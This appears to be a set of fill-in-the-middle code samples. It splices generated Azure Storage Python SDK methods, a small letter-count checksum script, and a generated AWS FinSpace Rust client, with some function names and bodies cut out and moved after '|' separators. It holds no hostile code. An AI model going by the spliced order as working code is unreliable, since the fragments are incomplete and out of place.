'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def get_properties(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> "_models.StorageAccount":
"""Returns the properties for the specified storage account including but not limited to name, SKU
name, location, and account status. The ListKeys operation should be used to retrieve storage
keys.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccount, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccount
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
# Construct URL
url = self.get_properties.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_properties.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
async def update(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.StorageAccountUpdateParameters",
**kwargs: Any
) -> "_models.StorageAccount":
"""The update operation can be used to update the SKU, encryption, access tier, or tags for a
storage account. It can also be used to map the account to a custom domain. Only one custom
domain is supported per storage account; the replacement/change of custom domain is not
supported. In order to replace an old custom domain, the old value must be cleared/unregistered
before a new value can be set. The update of multiple properties is supported. This call does
not change the storage keys for the account. If you want to change the storage account keys,
use the regenerate keys operation. The location and name of the storage account cannot be
changed after creation.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide for the updated account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccount, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccount
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccount"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'StorageAccountUpdateParameters')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccount', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.StorageAccountListResult"]:
"""Lists all the storage accounts available under the subscription. Note that storage keys are not
returned; use the ListKeys operation for this.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageAccountListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2017_10_01.models.StorageAccountListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageAccountListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
|
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Storage/storageAccounts'} # type: ignore
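    # The returned AsyncItemPaged supports async iteration, e.g. (client name assumed):
    #
    #   async for account in client.storage_accounts.list():
    #       print(account.name)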
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.StorageAccountListResult"]:
"""Lists all the storage accounts available under the given resource group. Note that storage keys
are not returned; use the ListKeys operation for this.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StorageAccountListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.storage.v2017_10_01.models.StorageAccountListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StorageAccountListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts'} # type: ignore
async def list_keys(
self,
resource_group_name: str,
account_name: str,
**kwargs: Any
) -> "_models.StorageAccountListKeysResult":
"""Lists the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccountListKeysResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountListKeysResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListKeysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
accept = "application/json, text/json"
# Construct URL
url = self.list_keys.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccountListKeysResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/listKeys'} # type: ignore
async def regenerate_key(
self,
resource_group_name: str,
account_name: str,
regenerate_key: "_models.StorageAccountRegenerateKeyParameters",
**kwargs: Any
) -> "_models.StorageAccountListKeysResult":
"""Regenerates one of the access keys for the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param regenerate_key: Specifies name of the key which should be regenerated -- key1 or key2.
:type regenerate_key: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountRegenerateKeyParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StorageAccountListKeysResult, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.StorageAccountListKeysResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageAccountListKeysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.regenerate_key.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(regenerate_key, 'StorageAccountRegenerateKeyParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('StorageAccountListKeysResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/regenerateKey'} # type: ignore
async def list_account_sas(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.AccountSasParameters",
**kwargs: Any
) -> "_models.ListAccountSasResponse":
"""List SAS credentials of a storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide to list SAS credentials for the storage account.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.AccountSasParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListAccountSasResponse, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.ListAccountSasResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListAccountSasResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.list_account_sas.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'AccountSasParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ListAccountSasResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_account_sas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/ListAccountSas'} # type: ignore
async def list_service_sas(
self,
resource_group_name: str,
account_name: str,
parameters: "_models.ServiceSasParameters",
**kwargs: Any
) -> "_models.ListServiceSasResponse":
"""List service SAS credentials of a specific resource.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param parameters: The parameters to provide to list service SAS credentials.
:type parameters: ~azure.mgmt.storage.v2017_10_01.models.ServiceSasParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ListServiceSasResponse, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2017_10_01.models.ListServiceSasResponse
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListServiceSasResponse"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2017-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self.list_service_sas.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'ServiceSasParameters')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ListServiceSasResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_service_sas.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/ListServiceSas'} # type: ignore
|
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
|
day2_part1.py
|
#!/usr/bin/env python3
import sys
def
|
(text):
chars = {}
for char in text:
if char not in chars:
chars[char] = 0
chars[char] += 1
counts = [False, False, False, False]
for count in chars.values():
if count < len(counts):
counts[count] = True
return counts
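# Checksum: multiply the number of IDs containing some letter exactly twice
# by the number of IDs containing some letter exactly three times.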
letter_two_times = 0
letter_three_times = 0
for line in sys.stdin:
counts = count_characters(line)
letter_two_times = letter_two_times + 1 if counts[2] else letter_two_times
letter_three_times = letter_three_times + 1 if counts[3] else letter_three_times
print(letter_two_times * letter_three_times)
|
count_characters
|
client.rs
|
// Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT.
#[derive(Debug)]
pub(crate) struct Handle {
pub(crate) client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
pub(crate) conf: crate::Config,
}
/// Client for FinSpace User Environment Management service
///
/// Client for invoking operations on FinSpace User Environment Management service. Each operation on FinSpace User Environment Management service is a method on
/// this struct. `.send()` MUST be invoked on the generated operations to dispatch the request to the service.
///
/// # Examples
/// **Constructing a client and invoking an operation**
/// ```rust,no_run
/// # async fn docs() {
/// // create a shared configuration. This can be used & shared between multiple service clients.
/// let shared_config = aws_config::load_from_env().await;
/// let client = aws_sdk_finspace::Client::new(&shared_config);
/// // invoke an operation
/// /* let rsp = client
/// .<operation_name>().
/// .<param>("some value")
/// .send().await; */
/// # }
/// ```
/// **Constructing a client with custom configuration**
/// ```rust,no_run
/// use aws_config::RetryConfig;
/// # async fn docs() {
/// let shared_config = aws_config::load_from_env().await;
/// let config = aws_sdk_finspace::config::Builder::from(&shared_config)
/// .retry_config(RetryConfig::disabled())
/// .build();
/// let client = aws_sdk_finspace::Client::from_conf(config);
/// # }
/// ```
#[derive(std::fmt::Debug)]
pub struct Client {
handle: std::sync::Arc<Handle>,
}
impl std::clone::Clone for Client {
fn clone(&self) -> Self {
Self {
handle: self.handle.clone(),
}
}
}
#[doc(inline)]
pub use aws_smithy_client::Builder;
impl
From<
aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
> for Client
{
fn from(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
) -> Self {
Self::with_config(client, crate::Config::builder().build())
}
}
impl Client {
/// Creates a client with the given service configuration.
pub fn
|
(
client: aws_smithy_client::Client<
aws_smithy_client::erase::DynConnector,
aws_smithy_client::erase::DynMiddleware<aws_smithy_client::erase::DynConnector>,
>,
conf: crate::Config,
) -> Self {
Self {
handle: std::sync::Arc::new(Handle { client, conf }),
}
}
/// Returns the client's configuration.
pub fn conf(&self) -> &crate::Config {
&self.handle.conf
}
}
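// A minimal end-to-end sketch combining the doc examples above (operation and
// parameter names follow the fluent builders documented below; error handling omitted):
//
//     let shared_config = aws_config::load_from_env().await;
//     let client = aws_sdk_finspace::Client::new(&shared_config);
//     let rsp = client.get_environment().environment_id("env-1234").send().await;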
impl Client {
/// Constructs a fluent builder for the [`CreateEnvironment`](crate::client::fluent_builders::CreateEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`name(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::name) / [`set_name(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_name): <p>The name of the FinSpace environment to be created.</p>
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_description): <p>The description of the FinSpace environment to be created.</p>
/// - [`kms_key_id(impl Into<String>)`](crate::client::fluent_builders::CreateEnvironment::kms_key_id) / [`set_kms_key_id(Option<String>)`](crate::client::fluent_builders::CreateEnvironment::set_kms_key_id): <p>The KMS key id to encrypt your data in the FinSpace environment.</p>
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::CreateEnvironment::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::CreateEnvironment::set_tags): <p>Add tags to your FinSpace environment.</p>
/// - [`federation_mode(FederationMode)`](crate::client::fluent_builders::CreateEnvironment::federation_mode) / [`set_federation_mode(Option<FederationMode>)`](crate::client::fluent_builders::CreateEnvironment::set_federation_mode): <p>Authentication mode for the environment.</p> <ul> <li> <p> <code>FEDERATED</code> - Users access FinSpace through Single Sign On (SSO) via your Identity provider.</p> </li> <li> <p> <code>LOCAL</code> - Users access FinSpace via email and password managed within the FinSpace environment.</p> </li> </ul>
/// - [`federation_parameters(FederationParameters)`](crate::client::fluent_builders::CreateEnvironment::federation_parameters) / [`set_federation_parameters(Option<FederationParameters>)`](crate::client::fluent_builders::CreateEnvironment::set_federation_parameters): <p>Configuration information when authentication mode is FEDERATED.</p>
/// - [`superuser_parameters(SuperuserParameters)`](crate::client::fluent_builders::CreateEnvironment::superuser_parameters) / [`set_superuser_parameters(Option<SuperuserParameters>)`](crate::client::fluent_builders::CreateEnvironment::set_superuser_parameters): <p>Configuration information for the superuser.</p>
/// - [`data_bundles(Vec<String>)`](crate::client::fluent_builders::CreateEnvironment::data_bundles) / [`set_data_bundles(Option<Vec<String>>)`](crate::client::fluent_builders::CreateEnvironment::set_data_bundles): <p>The list of Amazon Resource Names (ARN) of the data bundles to install. Currently supported data bundle ARNs:</p> <ul> <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/capital-markets-sample</code> - Contains sample Capital Markets datasets, categories and controlled vocabularies.</p> </li> <li> <p> <code>arn:aws:finspace:${Region}::data-bundle/taq</code> (default) - Contains trades and quotes data in addition to sample Capital Markets data.</p> </li> </ul>
/// - On success, responds with [`CreateEnvironmentOutput`](crate::output::CreateEnvironmentOutput) with field(s):
/// - [`environment_id(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_id): <p>The unique identifier for FinSpace environment that you created.</p>
/// - [`environment_arn(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_arn): <p>The Amazon Resource Name (ARN) of the FinSpace environment that you created.</p>
/// - [`environment_url(Option<String>)`](crate::output::CreateEnvironmentOutput::environment_url): <p>The sign-in url for the web application of the FinSpace environment you created.</p>
/// - On failure, responds with [`SdkError<CreateEnvironmentError>`](crate::error::CreateEnvironmentError)
pub fn create_environment(&self) -> fluent_builders::CreateEnvironment {
fluent_builders::CreateEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteEnvironment`](crate::client::fluent_builders::DeleteEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::DeleteEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::DeleteEnvironment::set_environment_id): <p>The identifier for the FinSpace environment.</p>
/// - On success, responds with [`DeleteEnvironmentOutput`](crate::output::DeleteEnvironmentOutput)
/// - On failure, responds with [`SdkError<DeleteEnvironmentError>`](crate::error::DeleteEnvironmentError)
pub fn delete_environment(&self) -> fluent_builders::DeleteEnvironment {
fluent_builders::DeleteEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`GetEnvironment`](crate::client::fluent_builders::GetEnvironment) operation.
///
/// - The fluent builder is configurable:
/// - [`environment_id(impl Into<String>)`](crate::client::fluent_builders::GetEnvironment::environment_id) / [`set_environment_id(Option<String>)`](crate::client::fluent_builders::GetEnvironment::set_environment_id): <p>The identifier of the FinSpace environment.</p>
/// - On success, responds with [`GetEnvironmentOutput`](crate::output::GetEnvironmentOutput) with field(s):
/// - [`environment(Option<Environment>)`](crate::output::GetEnvironmentOutput::environment): <p>The name of the FinSpace environment.</p>
/// - On failure, responds with [`SdkError<GetEnvironmentError>`](crate::error::GetEnvironmentError)
pub fn get_environment(&self) -> fluent_builders::GetEnvironment {
fluent_builders::GetEnvironment::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListEnvironments`](crate::client::fluent_builders::ListEnvironments) operation.
///
/// - The fluent builder is configurable:
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListEnvironments::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListEnvironments::set_next_token): <p>A token generated by FinSpace that specifies where to continue pagination if a previous request was truncated. To get the next set of pages, pass in the nextToken value from the response object of the previous page call.</p>
/// - [`max_results(i32)`](crate::client::fluent_builders::ListEnvironments::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListEnvironments::set_max_results): <p>The maximum number of results to return in this request.</p>
/// - On success, responds with [`ListEnvironmentsOutput`](crate::output::ListEnvironmentsOutput) with field(s):
/// - [`environments(Option<Vec<Environment>>)`](crate::output::ListEnvironmentsOutput::environments): <p>A list of all of your FinSpace environments.</p>
/// - [`next_token(Option<String>)`](crate::output::ListEnvironmentsOutput::next_token): <p>A token that you can use in a subsequent call to retrieve the next set of results.</p>
/// - On failure, responds with [`SdkError<ListEnvironmentsError>`](crate::error::ListEnvironmentsError)
pub fn list_environments(&self) -> fluent_builders::ListEnvironments {
fluent_builders::ListEnvironments::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListTagsForResource`](crate::client::fluent_builders::ListTagsForResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::ListTagsForResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::ListTagsForResource::set_resource_arn): <p>The Amazon Resource Name of the resource.</p>
/// - On success, responds with [`ListTagsForResourceOutput`](crate::output::ListTagsForResourceOutput) with field(s):
